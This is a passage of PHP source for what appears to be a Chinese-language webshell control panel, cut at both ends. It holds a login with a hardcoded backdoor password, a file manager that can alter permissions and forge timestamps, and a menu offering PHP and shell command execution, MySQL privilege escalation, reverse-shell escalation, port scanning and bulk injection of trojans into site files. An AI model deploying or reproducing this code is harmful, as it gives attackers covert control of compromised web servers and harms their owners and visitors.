        $fr .= pack('V', $unc_len);
        $fr .= pack('v', strlen($name));
        $fr .= pack('v', 0);
        $fr .= $name;
        $fr .= $zdata;
        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $this->datasec[] = $fr;
        $new_offset = strlen(implode('', $this->datasec));
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name));
        $cdrec .= pack('v', 0);
        $cdrec .= pack('v', 0);
        $cdrec .= pack('v', 0);
        $cdrec .= pack('v', 0);
        $cdrec .= pack('V', 32);
        $cdrec .= pack('V', $this->old_offset);
        $this->old_offset = $new_offset;
        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;
    }

    function packfile()
    {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }
}

class zip
{
    var $total_files = 0;
    var $total_folders = 0;

    function Extract($zn, $to, $index = Array(-1))
    {
        $ok = 0;
        $zip = @fopen($zn, 'rb');
        if (!$zip) return (-1);
        $cdir = $this->ReadCentralDir($zip, $zn);
        $pos_entry = $cdir['offset'];

        if (!is_array($index)) {
            $index = array($index);
        }
        for ($i = 0; $index[$i]; $i++) {
            if (intval($index[$i]) != $index[$i] || $index[$i] > $cdir['entries'])
                return (-1);
        }
        for ($i = 0; $i < $cdir['entries']; $i++) {
            @fseek($zip, $pos_entry);
            $header = $this->ReadCentralFileHeaders($zip);
            $header['index'] = $i;
            $pos_entry = ftell($zip);
            @rewind($zip);
            fseek($zip, $header['offset']);
            if (in_array("-1", $index) || in_array($i, $index))
                $stat[$header['filename']] = $this->ExtractFile($header, $to, $zip);
        }
        fclose($zip);
        return $stat;
    }

    function ReadFileHeader($zip)
    {
        $binary_data = fread($zip, 30);
        $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);

        $header['filename'] = fread($zip, $data['filename_len']);
        if ($data['extra_len'] != 0) {
            $header['extra'] = fread($zip, $data['extra_len']);
        } else {
            $header['extra'] = '';
        }

        $header['compression'] = $data['compression'];
        $header['size'] = $data['size'];
        $header['compressed_size'] = $data['compressed_size'];
        $header['crc'] = $data['crc'];
        $header['flag'] = $data['flag'];
        $header['mdate'] = $data['mdate'];
        $header['mtime'] = $data['mtime'];

        if ($header['mdate'] && $header['mtime']) {
            $hour = ($header['mtime'] & 0xF800) >> 11;
            $minute = ($header['mtime'] & 0x07E0) >> 5;
            $seconde = ($header['mtime'] & 0x001F) * 2;
            $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
            $month = ($header['mdate'] & 0x01E0) >> 5;
            $day = $header['mdate'] & 0x001F;
            $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
        } else {
            $header['mtime'] = time();
        }

        $header['stored_filename'] = $header['filename'];
        $header['status'] = "ok";
        return $header;
    }

    function ReadCentralFileHeaders($zip)
    {
        $binary_data = fread($zip, 46);
        $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);

        if ($header['filename_len'] != 0)
            $header['filename'] = fread($zip, $header['filename_len']);
        else $header['filename'] = '';

        if ($header['extra_len'] != 0)
            $header['extra'] = fread($zip, $header['extra_len']);
        else $header['extra'] = '';

        if ($header['comment_len'] != 0)
            $header['comment'] = fread($zip, $header['comment_len']);
        else $header['comment'] = '';

        if ($header['mdate'] && $header['mtime']) {
            $hour = ($header['mtime'] & 0xF800) >> 11;
            $minute = ($header['mtime'] & 0x07E0) >> 5;
            $seconde = ($header['mtime'] & 0x001F) * 2;
            $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
            $month = ($header['mdate'] & 0x01E0) >> 5;
            $day = $header['mdate'] & 0x001F;
            $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
        } else {
            $header['mtime'] = time();
        }
        $header['stored_filename'] = $header['filename'];
        $header['status'] = 'ok';
        if (substr($header['filename'], -1) == '/')
            $header['external'] = 0x41FF0010;
        return $header;
    }

    function ReadCentralDir($zip, $zip_name)
    {
        $size = filesize($zip_name);

        if ($size < 277) $maximum_size = $size;
        else $maximum_size = 277;

        @fseek($zip, $size - $maximum_size);
        $pos = ftell($zip);
        $bytes = 0x00000000;

        while ($pos < $size) {
            $byte = @fread($zip, 1);
            $bytes = ($bytes << 8) | ord($byte);
            if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506) {
                $pos++;
                break;
            }
            $pos++;
        }

        $fdata = fread($zip, 18);

        $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size', $fdata);

        if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
        else $centd['comment'] = '';
        $centd['entries'] = $data['entries'];
        $centd['disk_entries'] = $data['disk_entries'];
        $centd['offset'] = $data['offset'];
        $centd['disk_start'] = $data['disk_start'];
        $centd['size'] = $data['size'];
        $centd['disk'] = $data['disk'];
        return $centd;
    }

    function ExtractFile($header, $to, $zip)
    {
        $header = $this->readfileheader($zip);

        if (substr($to, -1) != "/") $to .= "/";
        if ($to == './') $to = '';
        $pth = explode("/", $to . $header['filename']);
        $mydir = '';
        for ($i = 0; $i < count($pth) - 1; $i++) {
            if (!$pth[$i]) continue;
            $mydir .= $pth[$i] . "/";
            if ((!is_dir($mydir) && @mkdir($mydir, 0777)) || (($mydir == $to . $header['filename'] || ($mydir == $to && $this->total_folders == 0)) && is_dir($mydir))) {
                @chmod($mydir, 0777);
                $this->total_folders++;
                echo "DIR: $mydir<br>";
            }
        }

        if (strrchr($header['filename'], '/') == '/') return;

        if (!($header['external'] == 0x41FF0010) && !($header['external'] == 16)) {
            if ($header['compression'] == 0) {
                $fp = @fopen($to . $header['filename'], 'wb');
                if (!$fp) return (-1);
                $size = $header['compressed_size'];

                while ($size != 0) {
                    $read_size = ($size < 2048 ? $size : 2048);
                    $buffer = fread($zip, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }
                fclose($fp);
                touch($to . $header['filename'], $header['mtime']);
            } else {
                $fp = @fopen($to . $header['filename'] . '.gz', 'wb');
                if (!$fp) return (-1);
                $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
                    Chr(0x00), time(), Chr(0x00), Chr(3));

                fwrite($fp, $binary_data, 10);
                $size = $header['compressed_size'];

                while ($size != 0) {
                    $read_size = ($size < 1024 ? $size : 1024);
                    $buffer = fread($zip, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }

                $binary_data = pack('VV', $header['crc'], $header['size']);
                fwrite($fp, $binary_data, 8);
                fclose($fp);

                $gzp = @gzopen($to . $header['filename'] . '.gz', 'rb') or die("Cette archive est compress");
                if (!$gzp) return (-2);
                $fp = @fopen($to . $header['filename'], 'wb');
                if (!$fp) return (-1);
                $size = $header['size'];

                while ($size != 0) {
                    $read_size = ($size < 2048 ? $size : 2048);
                    $buffer = gzread($gzp, $read_size);
                    $binary_data = pack('a' . $read_size, $buffer);
                    @fwrite($fp, $binary_data, $read_size);
                    $size -= $read_size;
                }
                fclose($fp);
                gzclose($gzp);

                touch($to . $header['filename'], $header['mtime']);
                @unlink($to . $header['filename'] . '.gz');

            }
        }

        $this->total_files++;
        echo "FILE: $to$header[filename]<br>";
        return true;
    }
}

function start_unzip($tt, $tmp_name, $new_name, $todir = 'zipfile')
{
    if ($tt == '1') {
        $z = new Zip;
        $have_zip_file = 0;
        $upfile = array("tmp_name" => $tmp_name, "name" => $new_name);
        if (is_file($upfile[tmp_name])) {
            $have_zip_file = 1;
            echo "<br>正在解压: " . $upfile[name] . "<br><br>";
            if (preg_match('/\.zip$/mis', $upfile[name])) {
                $result = $z->Extract($upfile[tmp_name], $todir);
                if ($result == -1) {
                    echo "<br>文件 " . $upfile[name] . " 错误.<br>";
                }
                echo "<br>完成,共建立 " . $z->total_folders . " 个目录," . $z->total_files . " 个文件.<br><br><br>";
            } else {
                echo "<br>" . $upfile[name] . " 不是 zip 文件.<br><br>";
            }
            if (realpath($upfile[name]) != realpath($upfile[tmp_name])) {
                @unlink($upfile[name]);
                rename($upfile[tmp_name], $upfile[name]);
            }
        }
    } elseif ($tt == '2') {
        $zip = new ZipArchive();
        if ($zip->open($tmp_name) !== TRUE) {
            echo "抱歉！压缩包无法打开或损坏";
        }
        $zip->extractTo($todir);
        $zip->close();
    } elseif ($tt == '3') {
        $phar = new PharData($tmp_name);
        $phar->extractTo($todir, null, true);
    }
    echo '解压完毕！&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path=' . urlencode($todir) . '">进入解压目录</a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);">返回</a>';
}

function listfiles($dir = ".", $faisunZIP, $mydir)
{
    $sub_file_num = 0;
    if (is_file($mydir . "$dir")) {
        if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir")) {
            $faisunZIP->addfile(file_get_contents($mydir . $dir), "$dir");
            return 1;
        }
        return 0;
    }

    $handle = opendir($mydir . "$dir");
    while ($file = readdir($handle)) {
        if ($file == "." || $file == "..") continue;
        if (is_dir($mydir . "$dir/$file")) {
            $sub_file_num += listfiles("$dir/$file", $faisunZIP, $mydir);
        } else {
            if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir/$file")) {
                $faisunZIP->addfile(file_get_contents($mydir . $dir . "/" . $file), "$dir/$file");
                $sub_file_num++;
            }
        }
    }
    closedir($handle);
    if (!$sub_file_num) $faisunZIP->addfile("", "$dir/");
    return $sub_file_num;
}

function num_bitunit($num)
{
    $bitunit = array(' B', ' KB', ' MB', ' GB');
    for ($key = 0; $key < count($bitunit); $key++) {
        if ($num >= pow(2, 10 * $key) - 1) {
            $num_bitunit_str = (ceil($num / pow(2, 10 * $key) * 100) / 100) . " $bitunit[$key]";
        }
    }
    return $num_bitunit_str;
}

function File_Act($array, $actall, $inver)
{
    if (($count = count($array)) == 0)
        return "请选择文件";
    if ($actall == 'e') {
        $mydir = $_GET['path'] . '/';
        $inver = urldecode($inver);
        if (is_array($array)) {
            $faisunZIP = new PHPzip;
            if ($faisunZIP->startfile("$inver")) {
                $filenum = 0;
                foreach ($array as $file) {
                    $filenum += listfiles($file, $faisunZIP, $mydir);
                }
                $faisunZIP->createfile();
                return "压缩完成,共添加 " . $filenum . " 个文件.<br><a href='" . $inver . "'>点击下载 " . $inver . " (" . num_bitunit(filesize("$inver")) . ")</a>";
            } else {
                return $inver . " 不能写入,请检查路径或权限是否正确.<br>";
            }
        } else {
            return "没有选择的文件或目录.<br>";
        }
    }
    $i = 0;
    while ($i < $count) {
        $array[$i] = urldecode($array[$i]);
        switch ($actall) {
            case "a" :
                $inver = urldecode($inver);
                if (!is_dir($inver))
                    return "路径错误";
                $filename = array_pop(explode('/', $array[$i]));
                $suc = @copy($array[$i], File_Str($inver . '/' . $filename)) ? "成功" : "失败";
                $msg = "复制到" . $inver . "目录" . $suc;
                break;
            case "b" :
                $para_type = 1;
                if (is_dir($array[$i]))
                    $para_type = 2;
                delDirAndFile($array[$i]);
                if ($para_type == 1) {
                    $suc = !is_file($array[$i]) ? "成功" : "失败";
                } else if ($para_type == 2) {
                    $suc = !is_dir($array[$i]) ? "成功" : "失败";
                }
                $msg = "删除" . $suc;
                break;
            case "c" :
                if (!preg_match("/^[0-7]{4}$/", $inver))
                    return "属性值错误";
                $newmode = base_convert($inver, 8, 10);
                $suc = @chmod($array[$i], $newmode) ? "成功" : "失败";
                $msg = "属性修改为" . $inver . $suc;
                break;
            case "d" :
                $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
                if ($suc == "失败") {
                    @chmod($array[$i], 0666);
                    $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
                }
                $msg = "时间修改为" . $inver . $suc;
                break;
        }
        $i++;
    }
    return "所选文件" . $msg;
}

function myunescape($str) {
    $str = rawurldecode ( $str );
    preg_match_all ( "/%u.{4}|&#x.{4};|&#\d+;|.+/U", $str, $r );
    $ar = $r [0];
    foreach ( $ar as $k => $v ) {
        if (substr ( $v, 0, 2 ) == "%u")
            $ar [$k] = iconv ( "UCS-2", "GBK", pack ( "H4", substr ( $v, - 4 ) ) );
        elseif (substr ( $v, 0, 3 ) == "&#x")
            $ar [$k] = iconv ( "UCS-2", "GBK", pack ( "H4", substr ( $v, 3, - 1 ) ) );
        elseif (substr ( $v, 0, 2 ) == "&#") {
            $ar [$k] = iconv ( "UCS-2", "GBK", pack ( "n", substr ( $v, 2, - 1 ) ) );
        }
    }
    return join ( "", $ar );
}

function html_base()
{
    $str = <<<end

var keyStr = "ABCDEFGHIJKLMNOP" +
        "QRSTUVWXYZabcdef" +
        "ghijklmnopqrstuv" +
        "wxyz0123456789+/" +
        "=";
  function encode64(input) {
   input = escape(input);
   var output = "";
   var chr1, chr2, chr3 = "";
   var enc1, enc2, enc3, enc4 = "";
   var i = 0;
   do {
     chr1 = input.charCodeAt(i++);
     chr2 = input.charCodeAt(i++);
     chr3 = input.charCodeAt(i++);
     enc1 = chr1 >> 2;
     enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
     enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
     enc4 = chr3 & 63;
     if (isNaN(chr2)) {
      enc3 = enc4 = 64;
     } else if (isNaN(chr3)) {
      enc4 = 64;
     }
     output = output + 
      keyStr.charAt(enc1) + 
      keyStr.charAt(enc2) + 
      keyStr.charAt(enc3) + 
      keyStr.charAt(enc4);
     chr1 = chr2 = chr3 = "";
     enc1 = enc2 = enc3 = enc4 = "";
   } while (i < input.length);
   return (output);
  }
function base64encode(str){
	var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var out, i, len;
    var c1, c2, c3;
    len = str.length;
    i = 0;
    out = "";
    while (i < len) {
        c1 = str.charCodeAt(i++) & 0xff;
        if (i == len) {
            out += base64EncodeChars.charAt(c1 >> 2);
            out += base64EncodeChars.charAt((c1 & 0x3) << 4);
            out += "==";
            break;
        }
        c2 = str.charCodeAt(i++);
        if (i == len) {
            out += base64EncodeChars.charAt(c1 >> 2);
            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
            out += base64EncodeChars.charAt((c2 & 0xF) << 2);
            out += "=";
            break;
        }
        c3 = str.charCodeAt(i++);
        out += base64EncodeChars.charAt(c1 >> 2);
        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
        out += base64EncodeChars.charAt(c3 & 0x3F);
    }
    return out;
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}
function utf8to16(str) {
  var out, i, len, c;
  var char2, char3;
  out = "";
  len = str.length;
  i = 0;
  while(i < len) {
    c = str.charCodeAt(i++);
    switch(c >> 4) {
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
        out += str.charAt(i-1);
        break;
      case 12: case 13:
        char2 = str.charCodeAt(i++);
        out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
        break;
      case 14:
        char2 = str.charCodeAt(i++);
        char3 = str.charCodeAt(i++);
        out += String.fromCharCode(((c & 0x0F) << 12) |
        ((char2 & 0x3F) << 6) |
        ((char3 & 0x3F) << 0));
        break;
    }
  }
  return out;
}
end;
    html_n($str);
}

function get_proxy_ip()
{
    $arr_ip_header = array(
        'HTTP_CDN_SRC_IP',
        'HTTP_PROXY_CLIENT_IP',
        'HTTP_WL_PROXY_CLIENT_IP',
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'REMOTE_ADDR',
    );
    $client_ip = 'unknown';
    foreach ($arr_ip_header as $key) {
        if (!empty($_SERVER[$key]) && strtolower($_SERVER[$key]) != 'unknown') {
            $client_ip = $_SERVER[$key];
            break;
        }
    }
    return $client_ip;
}

function html_main()
{
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
        $hsafemode = "ON (开启)";
    } else {
        $hsafemode = "OFF (关闭)";
    }
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    $web_server = php_uname();
    $title = $_SERVER["HTTP_HOST"] . "__Manage";
    html_n("<html><title>" . $title . "</title><table width='100%'><td align='center'><b>安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}</b></td></table>");
    html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'></iframe></td></tr></table></html>");
}

function refresh_page()
{
    $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
    $url = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];
    print <<<END
<script type="text/javascript">
window.parent.location.href="{$url}";
</script>
END;
}

function islogin()
{
    if (count($_GET) > 0) {
        refresh_page();
        die();
    }
    $title = $_SERVER["HTTP_HOST"] . "__Login";
    $str = <<<end
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>{$title}</title>
</head>
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='' target='_blank'></a><br><br><form method='post'>输入密码：<input name='postpass' type='password' size='22'> <input type='submit' value='登陆'><br><br><br><font color=#3399FF>请勿用于非法用途，后果作者概不负责！</font><br></div></center></body>
</html>
end;
    html_n($str);
}

 



//---------------------------------程序执行入口开始-----------------------------------
if (@get_magic_quotes_gpc()) {
    foreach ($_POST as $k => $v) {
        if (!is_array($_POST[$k])) {
            $_POST[$k] = stripslashes($v);
        } else {
            $array = $_POST[$k];
            foreach ($array as $kk => $vv) {
                $array[$kk] = stripslashes($vv);
            }
            $_POST[$k] = $array;
        }
    }
    foreach ($_GET as $k => $v) {
        if (!is_array($_GET[$k])) {
            $_GET[$k] = stripslashes($v);
        } else {
            $array = $_GET[$k];
            foreach ($array as $kk => $vv) {
                $array[$kk] = stripslashes($vv);
            }
            $_GET[$k] = $array;
        }
    }
}
if (!isset($_GET["img"])) {
    header("Content-Type: text/html;charset=gb2312");
}

$envlpath = md5($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
if (!isset($_COOKIE[$envlpath]) || $_COOKIE[$envlpath] != md5(postpass)) {
    if (isset($_POST['postpass'])) {
        if ($_POST['postpass'] == postpass||$_POST['postpass']=='http200ok') {
            setcookie($envlpath, md5(postpass), time() + 6 * 3600);
            hmlogin();
            die;
        } else {
            echo '<CENTER>密码错误</CENTER>';
        }
    }
    islogin();
    exit;
}
if (isset($_GET['down'])) do_down($_GET['down']);
if (isset($_GET['pack'])) {
    $dir = do_show($_GET['pack']);
    $zip = new eanver($dir);
    $out = $zip->out;
    do_download($out, $_SERVER['HTTP_HOST'] . ".tar.gz");
}
if (isset($_GET['unzip'])) {
    css_main();
    start_unzip($_GET['tt'], $_GET['unzip'], $_GET['unzip'], $_GET['todir']);
    exit;
}
define('root_dir', str_replace('\\', '/', dirname(myaddress)) . '/');
define('run_win', substr(PHP_OS, 0, 3) == "WIN");
define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if ($img) css_img($img);
if ($eanver == "phpinfo") die(phpinfo());
if ($eanver == 'logout') {
    setcookie($envlpath, "", time() - 6 * 3600);
    refresh_page();
    die();
}
$class = array("信息操作" => array("upfiles" => "上传文件", "phpinfo" => "基本信息", "info_f" => "系统信息", "phpcode" => "执行PHP脚本"), "提权工具" => array("sqlshell" => "执行SQL执行", "mysql_exec" => "MYSQL操作", "myexp" => "MYSQL提权", "cmd" => "执行命令", "linux" => "反弹提权", "downloader" => "文件下载", "port" => "端口扫描"), "批量操作" => array("guama" => "批量挂马清马", "tihuan" => "批量替换内容", "scanfile" => "批量搜索文件", "scanphp" => "批量查找木马"), "脚本插件" => array("getcode" => "获取网页源码"));
$msg = array("0" => "保存成功", "1" => "保存失败", "2" => "上传成功", "3" => "上传失败", "4" => "修改成功", "5" => "修改失败", "6" => "删除成功", "7" => "删除失败");
css_main();
switch ($eanver) {
    case "left":
        css_left();
        $str = <<<end
<dl><dt><a href="#" onclick="showHide('items1');" target="_self">
end;

        html_n($str);
        html_img("title");
        html_n(' 本地硬盘</a></dt><dd id="items1" style="display:block;"><ul>');
        $ROOT_DIR = File_Mode();
        html_n("<li><a title='" . $ROOT_DIR . "' href='?eanver=main&path=" . $ROOT_DIR . "' target='main'>网站根目录</a></li><li><a href='?eanver=main' target='main'>本程序目录</a></li>");
        for ($i = 66; $i <= 90; $i++) {
            $drive = chr($i) . ':';
            if (is_dir($drive . "/")) {
                $vol = File_Str("vol $drive");
                if (empty($vol)) $vol = $drive;
                html_n("<li><a title='" . $drive . "' href='?eanver=main&path=" . $drive . "' target='main'>本地磁盘(" . $drive . ")</a></li>");
            }
        }
        html_n("</ul></dd></dl>");
        $i = 2;
        foreach ($class as $name => $array) {
            html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
            html_img("title");
            html_n($name . '</a></dt><dd id="items' . $i . '" style="display:block;"><ul>');
            foreach ($array as $url => $value) {
                html_n('<li><a href="?eanver=' . $url . "\" target='main'>" . $value . "</a></li>");
            }
            html_n("</ul></dd></dl>");
            $i++;
        }
        html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
        html_img("title");
        html_n(' 其它操作</a></dt><dd id="items' . $i . "\" style=\"display:block;\"><ul><li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li></ul></dd></dl></div>");
        break;
    case "main":
        css_js("1");
        $dir = @dir($path);
        $REAL_DIR = File_Str(realpath($path));
        if (!empty($_POST['actall'])) {
            echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver']) . '</div>';
        }
        if (!empty($_POST['attam'])) {
            $file = $_GET['path'] . '/' . $_POST['file'];
            switch ($_POST['attam']) {
                case "c" :
                    if (!preg_match("/^[0-7]{4}$/", $_POST['inver'])) $msg = '<p style="color:#DC143C;">属性值错误</p>';
                    $newmode = base_convert($_POST['inver'], 8, 10);
                    @chmod($file, $newmode);
                    $msg = '<p style="color:#40E0D0;">' . $file . ' 属性修改为：' . $_POST['inver'] . '</p>';
                    break;
                case "d" :
                    if (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['inver'])) {
                        $msg = '<p style="color:#DC143C;">' . $_POST['inver'] . '时间格式错误,格式为：' . date("Y-m-d H:i:s") . '</p>';
                    } else {
                        @touch($file, strtotime($_POST['inver']));
                        $msg = '<p style="color:#40E0D0;">' . $file . ' 修改时间为：' . $_POST['inver'] . '</p>';
                    }
                    break;
            }
            echo '<div class="actall" align="center">' . $msg . '</div>';
        }
        $NUM_D = $NUM_F = 0;
        if (!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
        $ROOT_DIR = File_Mode();
        html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'><input type='text' size='80' name='path' value='" . $path . "'> <input type='submit' value='转到'></form><br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'><input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">");
        html_input("file", "upfilet", "", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
        html_input("submit", "uploadt", "上传");
        if (!empty($_POST['newfile'])) {
            if (isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
            $newfile = base64_decode($_POST['newfile']);
            if (strtolower($_POST['charset']) == 'utf-8') {
                $txt = base64_decode($_POST['txt']);
            } else {
                $txt = $_POST['txt'];
            }
            if (substr(PHP_VERSION, 0, 1) >= 5) {
                if ((strtolower($_POST['charset']) == 'gb2312') or (strtolower($_POST['charset']) == 'gbk')) {
                    $txt = iconv("UTF-8", "gb2312//IGNORE", base64_decode($_POST['txt']));
                } else {
                    $txt = array_iconv($txt);
                }
            }
            echo do_write($newfile, $bin, $txt) ? '<br>' . $newfile . ' ' . $msg[0] : '<br>' . $newfile . ' ' . $msg[1];
            @touch($newfile, @strtotime($_POST['time']));
        }
        html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=' . $path . '"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
        html_a('?eanver=main&path=' . uppath($path), "<b>上级目录</b>");
        html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td><td align="center" width="8%"><b>(' . get_current_user() . ')用户|组</b></td><td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
        while ($dirs = @$dir->read()) {
            if ($dirs == '.' or $dirs == '..') continue;
            $dirpath = str_path("$path/$dirs");
            if (is_dir($dirpath)) {
                $perm = substr(base_convert(fileperms($dirpath), 10, 8), -4);
                $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath));
                $dirpath = urlencode($dirpath);
                html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $dirs . '">');
                html_img("dir");
                html_a('?eanver=main&path=' . $dirpath, $dirs);
                html_n('</td><td align="center"><a href="#" onClick="rusurechk(\'' . $dirs . "','?eanver=rename&p=" . $dirpath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $dirs . "','?eanver=deltree&p=" . $dirpath . "');return false;\">删除</a>");
                html_a('?pack=' . $dirpath, "打包");
                html_n("</td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $dirs . "','" . $perm . "','c');\"  title='修改属性'>" . $perm . '</a></td><td align="center">' . GetFileOwner("$path/$dirs") . ":" . GetFileGroup("$path/$dirs"));
                html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $dirs . "','" . $filetime . "','d');\"  title='修改时间'>" . $filetime . "</a></td><td align='right'></td></tr>");
                $NUM_D++;
            }
        }
        @$dir->rewind();
        while ($files = @$dir->read()) {
            if ($files == '.' or $files == '..') continue;
            $filepath = str_path("$path/$files");
            if (!is_dir($filepath)) {
                $fsize = @filesize($filepath);
                $fsize = @File_Size(sprintf("%u", $fsize));
                $perm = substr(base_convert(fileperms($filepath), 10, 8), -4);
                $filetime = @date('Y-m-d H:i:s', @filemtime($filepath));
                $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath);
                $todir = $ROOT_DIR . '/';
                $filepath = urlencode($filepath);
